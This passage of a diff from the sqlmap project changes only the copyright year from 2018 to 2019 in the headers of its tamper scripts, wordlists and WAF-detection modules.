+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py
index 67e72538b47..1394d14d4a0 100644
--- a/tamper/space2mysqldash.py
+++ b/tamper/space2mysqldash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2plus.py b/tamper/space2plus.py
index d8ef65efdaf..06868cf3379 100644
--- a/tamper/space2plus.py
+++ b/tamper/space2plus.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py
index 0234b65caed..d8cd9423998 100644
--- a/tamper/space2randomblank.py
+++ b/tamper/space2randomblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py
index aad77f1722d..6cac245b917 100644
--- a/tamper/symboliclogical.py
+++ b/tamper/symboliclogical.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py
index 46e00447eb4..6d24acb062a 100644
--- a/tamper/unionalltounion.py
+++ b/tamper/unionalltounion.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index 84746e9eb2f..9cea29e05a4 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/uppercase.py b/tamper/uppercase.py
index 71aeba794cf..faec80704ba 100644
--- a/tamper/uppercase.py
+++ b/tamper/uppercase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/varnish.py b/tamper/varnish.py
index b0b020e7ebd..d37f4ae2f58 100644
--- a/tamper/varnish.py
+++ b/tamper/varnish.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py
index 31524e60855..af27d4cbe50 100644
--- a/tamper/versionedkeywords.py
+++ b/tamper/versionedkeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py
index d8480814724..4f926344228 100644
--- a/tamper/versionedmorekeywords.py
+++ b/tamper/versionedmorekeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py
index b0c8d85959e..88845f8a6f4 100644
--- a/tamper/xforwardedfor.py
+++ b/tamper/xforwardedfor.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/txt/common-columns.txt b/txt/common-columns.txt
index 8efec7578e2..ad302d3b302 100644
--- a/txt/common-columns.txt
+++ b/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
 id
diff --git a/txt/common-outputs.txt b/txt/common-outputs.txt
index e4f89aafe9b..874bd83e27f 100644
--- a/txt/common-outputs.txt
+++ b/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
 [Banners]
diff --git a/txt/common-tables.txt b/txt/common-tables.txt
index 184ee14d7a1..0067d971675 100644
--- a/txt/common-tables.txt
+++ b/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
 users
diff --git a/txt/keywords.txt b/txt/keywords.txt
index f044faa26da..0dbc046b00c 100644
--- a/txt/keywords.txt
+++ b/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
 # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
diff --git a/txt/user-agents.txt b/txt/user-agents.txt
index 602e9d3c3d1..2e0b12bf76a 100644
--- a/txt/user-agents.txt
+++ b/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
 # Opera
diff --git a/waf/360.py b/waf/360.py
index 07b01603a9b..25c61f75a3d 100644
--- a/waf/360.py
+++ b/waf/360.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/__init__.py b/waf/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/waf/__init__.py
+++ b/waf/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/aesecure.py b/waf/aesecure.py
index 18b87bfaf14..4c85b8b5d8a 100644
--- a/waf/aesecure.py
+++ b/waf/aesecure.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/airlock.py b/waf/airlock.py
index 6f76073d9a8..fe6b9db6eb4 100644
--- a/waf/airlock.py
+++ b/waf/airlock.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/anquanbao.py b/waf/anquanbao.py
index 42f608c7bae..d0b3d36e6b5 100644
--- a/waf/anquanbao.py
+++ b/waf/anquanbao.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/approach.py b/waf/approach.py
index 1077e0b673d..80e9d563662 100644
--- a/waf/approach.py
+++ b/waf/approach.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/armor.py b/waf/armor.py
index 1ca7fc542e8..266c94ab8e1 100644
--- a/waf/armor.py
+++ b/waf/armor.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/asm.py b/waf/asm.py
index 9bfb31371c4..6f07d5909a7 100644
--- a/waf/asm.py
+++ b/waf/asm.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/aws.py b/waf/aws.py
index aa561629964..694ad589f0b 100644
--- a/waf/aws.py
+++ b/waf/aws.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/baidu.py b/waf/baidu.py
index b9dbcd89436..50e5542cad4 100644
--- a/waf/baidu.py
+++ b/waf/baidu.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/barracuda.py b/waf/barracuda.py
index daad0577175..0e769a65b17 100644
--- a/waf/barracuda.py
+++ b/waf/barracuda.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/bigip.py b/waf/bigip.py
index 9cc248a8003..ff1d5dc7833 100644
--- a/waf/bigip.py
+++ b/waf/bigip.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/binarysec.py b/waf/binarysec.py
index dd98a527088..31905d1de51 100644
--- a/waf/binarysec.py
+++ b/waf/binarysec.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/blockdos.py b/waf/blockdos.py
index af2ea4c8f5f..fe430ad70c7 100644
--- a/waf/blockdos.py
+++ b/waf/blockdos.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/bluedon.py b/waf/bluedon.py
index 678f5e423e6..c38b025a6e2 100644
--- a/waf/bluedon.py
+++ b/waf/bluedon.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/chinacache.py b/waf/chinacache.py
index d4d2d5aaebb..caf223851b2 100644
--- a/waf/chinacache.py
+++ b/waf/chinacache.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/ciscoacexml.py b/waf/ciscoacexml.py
index 277a27f4e11..ec6d2c44e66 100644
--- a/waf/ciscoacexml.py
+++ b/waf/ciscoacexml.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/cloudbric.py b/waf/cloudbric.py
index 94963232934..6f2931f55e2 100644
--- a/waf/cloudbric.py
+++ b/waf/cloudbric.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/cloudflare.py b/waf/cloudflare.py
index 249b4b8b528..2112eba936f 100644
--- a/waf/cloudflare.py
+++ b/waf/cloudflare.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/cloudfront.py b/waf/cloudfront.py
index 462f909acf3..081c9750209 100644
--- a/waf/cloudfront.py
+++ b/waf/cloudfront.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/comodo.py b/waf/comodo.py
index f37902f85d3..6fd2c114a12 100644
--- a/waf/comodo.py
+++ b/waf/comodo.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/crawlprotect.py b/waf/crawlprotect.py
index ed1698f961b..669c927ec5c 100644
--- a/waf/crawlprotect.py
+++ b/waf/crawlprotect.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/waf/datapower.py b/waf/datapower.py
index 3e292c2cd93..b1af70a8f6a 100644
--- a/waf/datapower.py
+++ b/waf/datapower.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/denyall.py b/waf/denyall.py
index 807136f2688..6da57b63d6e 100644
--- a/waf/denyall.py
+++ b/waf/denyall.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/distil.py b/waf/distil.py
index 064425dcf5e..4747e17291e 100644
--- a/waf/distil.py
+++ b/waf/distil.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/dosarrest.py b/waf/dosarrest.py
index 42b14a3721a..5d9666689b8 100644
--- a/waf/dosarrest.py
+++ b/waf/dosarrest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/dotdefender.py b/waf/dotdefender.py
index 2a49b0def41..cf9c2d01c19 100644
--- a/waf/dotdefender.py
+++ b/waf/dotdefender.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/edgecast.py b/waf/edgecast.py
index ad789b0793f..444ea35d4af 100644
--- a/waf/edgecast.py
+++ b/waf/edgecast.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/expressionengine.py b/waf/expressionengine.py
index 33edcd11ecf..7b3c9b47e8d 100644
--- a/waf/expressionengine.py
+++ b/waf/expressionengine.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/fortiweb.py b/waf/fortiweb.py
index 0305df73307..68619bcae07 100644
--- a/waf/fortiweb.py
+++ b/waf/fortiweb.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/generic.py b/waf/generic.py
index 4be618d8813..31335e1f91e 100644
--- a/waf/generic.py
+++ b/waf/generic.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/hyperguard.py b/waf/hyperguard.py
index 78aa1c7a98a..619e6f04fad 100644
--- a/waf/hyperguard.py
+++ b/waf/hyperguard.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/incapsula.py b/waf/incapsula.py
index c5e299057cb..2d52644560b 100644
--- a/waf/incapsula.py
+++ b/waf/incapsula.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/isaserver.py b/waf/isaserver.py
index df83c6ff099..2f4f11137f5 100644
--- a/waf/isaserver.py
+++ b/waf/isaserver.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/jiasule.py b/waf/jiasule.py
index 20aff285cd7..465cdcf75f2 100644
--- a/waf/jiasule.py
+++ b/waf/jiasule.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/knownsec.py b/waf/knownsec.py
index 3372a6b2218..fc6f629b864 100644
--- a/waf/knownsec.py
+++ b/waf/knownsec.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/kona.py b/waf/kona.py
index f24702411d0..be124a92c18 100644
--- a/waf/kona.py
+++ b/waf/kona.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/modsecurity.py b/waf/modsecurity.py
index 64d36264177..d5d6d8ff41f 100644
--- a/waf/modsecurity.py
+++ b/waf/modsecurity.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/naxsi.py b/waf/naxsi.py
index 7fb42a11858..494d91db72c 100644
--- a/waf/naxsi.py
+++ b/waf/naxsi.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/netcontinuum.py b/waf/netcontinuum.py
index f899a2eeb73..2a5aaf1b7c0 100644
--- a/waf/netcontinuum.py
+++ b/waf/netcontinuum.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/netscaler.py b/waf/netscaler.py
index 52e6bc0490f..7a8ac59685f 100644
--- a/waf/netscaler.py
+++ b/waf/netscaler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/newdefend.py b/waf/newdefend.py
index 9153e8f1999..c96208a36b0 100644
--- a/waf/newdefend.py
+++ b/waf/newdefend.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/nsfocus.py b/waf/nsfocus.py
index 758ba293bad..b5c95804e71 100644
--- a/waf/nsfocus.py
+++ b/waf/nsfocus.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/paloalto.py b/waf/paloalto.py
index 095006fbed9..b23892a2c2d 100644
--- a/waf/paloalto.py
+++ b/waf/paloalto.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/profense.py b/waf/profense.py
index fef24231b82..85ad6d22e14 100644
--- a/waf/profense.py
+++ b/waf/profense.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/proventia.py b/waf/proventia.py
index d59f23b5713..3aca6a3d66c 100644
--- a/waf/proventia.py
+++ b/waf/proventia.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/radware.py b/waf/radware.py
index 42642136dc0..560a50fe1b7 100644
--- a/waf/radware.py
+++ b/waf/radware.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/reblaze.py b/waf/reblaze.py
index 6226f4fca7f..a5a6a7936c1 100644
--- a/waf/reblaze.py
+++ b/waf/reblaze.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/requestvalidationmode.py b/waf/requestvalidationmode.py
index 5e1ce590d97..ec651de899a 100644
--- a/waf/requestvalidationmode.py
+++ b/waf/requestvalidationmode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/safe3.py b/waf/safe3.py
index 2d4a294c009..2ed28a06529 100644
--- a/waf/safe3.py
+++ b/waf/safe3.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/safedog.py b/waf/safedog.py
index aabbabcbe43..2e0f8fd0b32 100644
--- a/waf/safedog.py
+++ b/waf/safedog.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/secureiis.py b/waf/secureiis.py
index be22a0a58de..b9b3f48397f 100644
--- a/waf/secureiis.py
+++ b/waf/secureiis.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/senginx.py b/waf/senginx.py
index 80c5cf0a52f..33c3c6d8f3e 100644
--- a/waf/senginx.py
+++ b/waf/senginx.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/sitelock.py b/waf/sitelock.py
index e17b67c620e..03eb231d1d5 100644
--- a/waf/sitelock.py
+++ b/waf/sitelock.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/sonicwall.py b/waf/sonicwall.py
index f87d9c40c6f..49a54503183 100644
--- a/waf/sonicwall.py
+++ b/waf/sonicwall.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/sophos.py b/waf/sophos.py
index ea7e83658e3..5ff97abf1d0 100644
--- a/waf/sophos.py
+++ b/waf/sophos.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/stingray.py b/waf/stingray.py
index 896ba765e47..bdbda8edf3a 100644
--- a/waf/stingray.py
+++ b/waf/stingray.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/sucuri.py b/waf/sucuri.py
index 636008f74d2..33cf57a7078 100644
--- a/waf/sucuri.py
+++ b/waf/sucuri.py
